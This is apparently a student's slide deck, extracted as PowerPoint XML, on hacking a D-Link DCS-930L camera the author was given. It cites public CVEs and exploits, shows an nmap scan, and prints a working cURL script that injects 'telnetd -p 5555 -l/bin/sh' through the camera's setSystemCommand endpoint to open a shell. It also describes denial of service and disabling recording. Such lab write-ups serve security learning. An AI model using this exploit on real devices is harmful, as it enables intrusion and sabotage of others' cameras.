    <dgm:cxn modelId="{A1C80AF5-27D5-4598-BCC2-314C9F84C18C}" type="presParOf" srcId="{39A8740F-432F-479E-AA49-444DF61F1F46}" destId="{C08FC7E6-C3B8-4FD8-970A-C950F10C58FD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{0A2C3BAC-0ECC-4812-B752-2409B3CD121A}" type="presParOf" srcId="{39A8740F-432F-479E-AA49-444DF61F1F46}" destId="{9454F58A-1817-41EB-A937-B9DDAC0D60AC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{449047F5-40D8-482D-8495-3C2263340B7D}" type="presParOf" srcId="{39A8740F-432F-479E-AA49-444DF61F1F46}" destId="{471B4A98-1BCE-4624-8873-902E5262A200}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{95A0E768-3F21-4232-9A75-6419207629A1}" type="presParOf" srcId="{39A8740F-432F-479E-AA49-444DF61F1F46}" destId="{A4E274E3-DF81-4630-A2F9-D0EC15CDC8E1}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{EF8696BE-898B-429A-B4A1-E6AFE8A4018D}" type="presParOf" srcId="{39A8740F-432F-479E-AA49-444DF61F1F46}" destId="{5ED86A7A-822B-45E7-B80E-905E7E25BFFD}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{7C4CE61E-A265-40F9-9B89-EDE34CF3A8AA}" type="presParOf" srcId="{B4248D80-03D6-42D4-956C-9B9381D4B6BA}" destId="{BC689362-EB3E-4608-831B-EE96D7AD4090}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{5F3C106B-1566-43EB-A238-2E3E9A2B2CA0}" type="presParOf" srcId="{B4248D80-03D6-42D4-956C-9B9381D4B6BA}" destId="{D2C0C481-2A55-4C61-99EB-845CAEAB17DE}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{D2D8456F-49F8-4EAF-BE47-D24987EBE984}" type="presParOf" srcId="{D2C0C481-2A55-4C61-99EB-845CAEAB17DE}" destId="{2AFEEE01-404C-4F5D-9226-76866EF59C03}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{61B2F067-3A25-4D02-93F9-A6987FA5091D}" type="presParOf" srcId="{D2C0C481-2A55-4C61-99EB-845CAEAB17DE}" destId="{4195E4C3-37BF-4FA0-8DAE-EF606617F8AC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{90F1CDB5-7F08-4142-9D34-53484B62E654}" type="presParOf" srcId="{D2C0C481-2A55-4C61-99EB-845CAEAB17DE}" destId="{05DC5C70-E27A-4D4B-A274-F76E56E5290C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{EACE941B-B3C9-4F77-98CA-C4C7FC71D1EB}" type="presParOf" srcId="{D2C0C481-2A55-4C61-99EB-845CAEAB17DE}" destId="{BCDBBAE4-8FC4-4F09-99C2-96EA000435F0}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconVerticalSolidList"/>
    <dgm:cxn modelId="{65590A0F-10D9-4FB0-89FA-331371466E0B}" type="presParOf" srcId="{D2C0C481-2A55-4C61-99EB-845CAEAB17DE}" destId="{0A19D9A4-2874-4105-99EF-6CBB927A9C9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60F41-0B21-45D5-B842-66C1132F86B8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1D5CF-9EFB-4FBA-AEA0-4A809CAC8812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ED0BE-71A7-4C38-B8D6-D5F49F1FFE18}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1057476" y="1806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script: </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1057476" y="1806"/>
        <a:ext cx="4732020" cy="915564"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D42CAFE4-7CDE-4F0E-B248-FA6201F1852C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5789496" y="1806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https://github.com/tacnetsol/CVE-2019-10999</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5789496" y="1806"/>
        <a:ext cx="4726103" cy="915564"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DA1DF49B-B4C6-49BC-8745-6B7E34DE99B6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02A58-D9B5-4FC4-B21B-6D2D8EA958BD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E447C-0A54-45F6-B6B9-628669E2D156}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1057476" y="1146262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Buffer Overflow CVE: </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1057476" y="1146262"/>
        <a:ext cx="4732020" cy="915564"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5922A613-355E-4F0E-A06B-F532093CED2A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5789496" y="1146262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https://nvd.nist.gov/vuln/detail/CVE-2019-10999#range-4307387</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5789496" y="1146262"/>
        <a:ext cx="4726103" cy="915564"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C08FC7E6-C3B8-4FD8-970A-C950F10C58FD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4F58A-1817-41EB-A937-B9DDAC0D60AC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274E3-DF81-4630-A2F9-D0EC15CDC8E1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1057476" y="2290717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Metasploit module: </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1057476" y="2290717"/>
        <a:ext cx="4732020" cy="915564"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5ED86A7A-822B-45E7-B80E-905E7E25BFFD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5789496" y="2290717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https://www.exploit-db.com/exploits/39437</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5789496" y="2290717"/>
        <a:ext cx="4726103" cy="915564"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2AFEEE01-404C-4F5D-9226-76866EF59C03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5E4C3-37BF-4FA0-8DAE-EF606617F8AC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BBAE4-8FC4-4F09-99C2-96EA000435F0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1057476" y="3435173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Command Injection CVE: </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1057476" y="3435173"/>
        <a:ext cx="4732020" cy="915564"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0A19D9A4-2874-4105-99EF-6CBB927A9C9D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5789496" y="3435173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https://nvd.nist.gov/vuln/detail/CVE-2016-11021</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5789496" y="3435173"/>
        <a:ext cx="4726103" cy="915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2F59-0C21-97C9-42D3-0C5E1D14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28E03-2B82-CE2B-1BBC-A6BE91AD2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B02B-1F50-E655-7FF9-AC412D64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021B-32C7-331E-7151-A5277347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831C-526E-8336-46D6-EC0C5C8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1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B9BE-DB53-9FA0-8D86-88579EDD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DC40-283B-5960-E5A7-A63E4E7EB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775C-1FA7-5AF2-6C7D-5A5D0312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A4ED-091D-02F4-4A41-CE414E52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7AED6-FC9D-AE20-3BD3-35B925E1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E3E13-A4A8-C024-699D-8323F9D66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34E50-EA39-C234-CA82-B0BBB1C60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4A87-6DDD-3E64-596F-72B0AB04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DA59-BC81-53CD-9BDA-553DAC4E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768C-B718-B1F5-F253-85CB197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148-4324-CEFD-D56F-CD5A6A0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ADE8-D044-B22A-DA6E-B386D888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F3EA-B53A-F467-301B-E349BD21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90A7-EE5B-CB46-C459-17E3D08A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51A0-15DA-AB5F-1943-C5D42C9F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C4EA-8DE2-36FF-8211-DD7B1E84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5E70-9CA1-A78D-192F-8A5C775B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130A-1189-DDE7-A26A-576AC015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403D-58B3-38A6-B5AA-1756FC0A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471A-5A36-CEB6-D0A5-CE5418BD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D63C-9FAB-F7F9-6D4A-F3C40DBB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3478-9B3F-AC2B-9EBF-00908CD14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2793-AD2F-7B17-D6AE-972C2814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F8CD-AD7E-49A5-6D02-9F72B52A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222DB-77C7-2743-47E7-727B8AEA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A2077-6034-9DFF-172D-3A76098E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B765-DCD3-E19A-DEF9-AC11E3BF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BD69-D0BE-C931-FE31-69B25DEBA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A4D3-547E-7D4C-2491-A3C5B6B0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D8671-E715-BED5-227D-6E24602D7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82C96-DF48-5F72-0E8B-6086E291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DFB63-A2DA-83FF-BDA5-4E617004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C251A-1C84-02A5-D564-92408E79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4D356-D690-374B-01A4-AD6A76DD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954E-902A-A67E-3A8E-F2D84BEF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84559-79DB-407E-11A4-99031221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3244-1184-416A-553A-F48376E3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CECE5-FC41-9008-3E2B-0B915A2F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97DBB-BDAB-2F10-91F1-33ED31E0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966E-5702-9FBC-87E9-7313A3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9A36-4E4D-B607-0E01-AE1580BA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C93-60D4-6A07-3E79-48C06CC2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A74C-2716-6FDD-DF8C-4F3397B4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2D48-724F-2AA0-FA8C-7478655D4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7514B-6111-B3F6-1A28-06B8EF7D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51EAA-CFBB-9446-5DED-1D2DB6B3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91B0-38AA-F53C-0A95-EE6996FE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0540-0542-9F99-1E99-4642EB1F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F623E-4277-10FE-38FB-77A3E6118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81C0-4872-DFC9-63AE-A42367B26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6B7D-0F1D-4C1D-7B7B-30E932BB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43A8-0B9C-06F1-CCD7-8F3503D5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0C3F1-1FE5-B436-E33D-8D3E2A8E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B0348-2C85-10B6-FCC2-E76D2562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3C408-42F4-AFA1-427B-672A8B22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B20F-911F-968B-8EA1-7E3F1E27A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B91D6-4507-43D5-A7C6-3CCA13C1CC2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26DA-898D-35CA-6FB7-336F28B17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9ECC-0F47-072C-D109-C087C1194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1089-00C4-41D0-BFDE-FDE9BAFE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6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9BAEB-4686-0BC3-70B9-F399E8BC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D-Link Camera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7D3B-7BCD-70A8-C3B1-352FFA91C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Jack Lee</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="341439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288D-FF32-1F6E-3EC6-128EA14B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1FA6-48A1-0269-47DA-23976C71C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The website had a file upload directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>I was able to upload my own image and reference it in the website HTML (Vi was allowed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>I could also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>poweroff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> the camera and disable video recording from the shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A screenshot of a cat&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AE6170B-8992-8239-A54E-728C5385D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18" y="3429001"/>
            <a:ext cx="3524138" cy="301313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9E6E9E8-2651-5987-C19C-E3354EBC7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3883" r="12647" b="2541"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7266218" y="415861"/>
            <a:ext cx="3437180" cy="27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4C0A1-2EF1-7913-47A0-EDD62616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Lessons Learned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ED7F-A210-2AED-FD22-07B8E7E7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Explore every option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Take notes along the way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to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cURL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About </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BusyBox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134A9D84-4643-FE77-FC31-50B1413B2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2" r="42498" b="37985"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110716" y="1665335"/>
            <a:ext cx="6596652" cy="33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7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AA43-5368-1B59-773B-AA4024C7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Future Ideas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0A25123B-7E85-3ECC-8551-224944278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77FA5B0-8DFC-119E-EF93-DB90AB50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 could automate the image upload process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The script would upload a user-specified image and edit the html to point towards it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ex: ./exploit.sh [image path]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could try the buffer overflow method again</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>telnetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –p 5555 –l /bin/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2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0DC2A-FCAB-A88E-700B-87219C8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A201D1-9945-0431-0ED9-758C5EAA6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71270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22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F7B35-7848-AD87-1556-D761FA0B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BFD-1F89-6F38-BA2F-E3B07F525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Background and Project Goals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Research</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Trial and Error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="200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91DED-549C-5510-7564-53339401C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000" dirty="0"/>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Discovery cont’d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Denial of Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Lessons Learned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Future Ideas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Sources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464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FAD0-50F9-5E60-A02A-CADFEBD9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 dirty="0"/>
              <a:t>Background and Project Goals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B390-AE5D-C3BF-E1C1-73FAD029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700" b="1" dirty="0"/>
              <a:t>Background</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>I was given a D-Link camera (DCS-930L)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>The camera is known to have 0-day vulnerabilities in the web interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>Project Goals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Determine open ports and services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Cause Denial of Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Gain access to the camera using a vulnerability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 descr="A picture containing electronics, indoor, white&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC5E3B01-3ABE-6778-DDA3-CCDD2213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11" y="2196776"/>
            <a:ext cx="2560931" cy="3012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2D319-CAC3-4270-FA47-9F6A85C50561}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7947011" y="4908350"/>
            <a:ext cx="2560931" cy="3012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50" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.dlink.com.sg/product/wireless-cloud-ip-camera/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="355154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5FD0A-37BD-D079-A5EA-EF2FC59A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D348-127D-C8E9-3B1F-BB19EC30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D-Link DCS90L cameras are vulnerable to a number of CVE’s: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE-2016-11021: web interface allows remote command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE-2019-10999: buffer overflow allowing remote command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1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I found two existing exploit scripts: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 Python script on GitHub that exploits the buffer overflow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 Metasploit module that exploits the web interface</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3767540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9549-DF0E-6ABD-E72B-588D426D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91035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dirty="0"/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AB3B-94E8-E5F6-44C3-8BAB92A0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244314"/>
            <a:ext cx="3941064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Default IP address with ethernet access is 192.168.0.20</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>(I didn’t have ethernet access yet)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>I couldn’t access my router so I had to find it:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>															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682E00-5E65-1601-1992-D74F86FA6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27" y="1695635"/>
            <a:ext cx="7706725" cy="3487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A3E7A-0251-ED8B-852D-1CD7502A6257}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="183848" y="4416271"/>
            <a:ext cx="532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sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>sU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t> –O –v 192.168.1.*</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110839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1B0F4D0-9CA0-4F41-EA67-50D83D2D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3574035"/>
            <a:ext cx="5559696" cy="2918840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Freeform: Shape 4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FF93B-318F-C881-14A0-283B673D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/>
              <a:t>Trial and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D532-1280-B5D4-DFA0-CDA63E20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1700" dirty="0"/>
              <a:t>With the IP and known vulnerabilities, I tried both exploit methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>The Python script had issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>I tried to fix it, but it wasn’t worth the bother</a:t>
            </a:r>
          </a:p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sz="1700" dirty="0"/>
              <a:t>The Metasploit module worked </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>I wrote a script using what I learned and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> to grant myself telnet access without Metasploit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496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D049-AE48-25A4-8DEA-2145CCF0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2EC-1EF1-30C5-115B-0E2C7F62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6210300" cy="581183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My Script: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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#!/bin/bash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echo "sending </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> request“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curl -X POST \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http://192.168.0.20/setSystemCommand \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-H 'Authorization: Basic YWRtaW46' \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-H 'Content-Type: application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' \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-d '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ReplySuccessPage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=docmd.htm' \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-d '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ReplyErrorPage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=docmd.htm' \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-d '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SystemCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>telnetd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -p 5555 -l/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>' \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-d '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ConfigSystemCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=Save' &amp;&gt;/dev/null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echo "Request successful, connecting to telnet...“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telnet 192.168.0.20 5555</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3759126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B0F56-5FD4-A5CE-1D92-84EA5E9A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Discovery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06565B-6BFB-E0C2-D298-D5700F6D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91807"/>
            <a:ext cx="4582116" cy="3985155"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The camera runs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
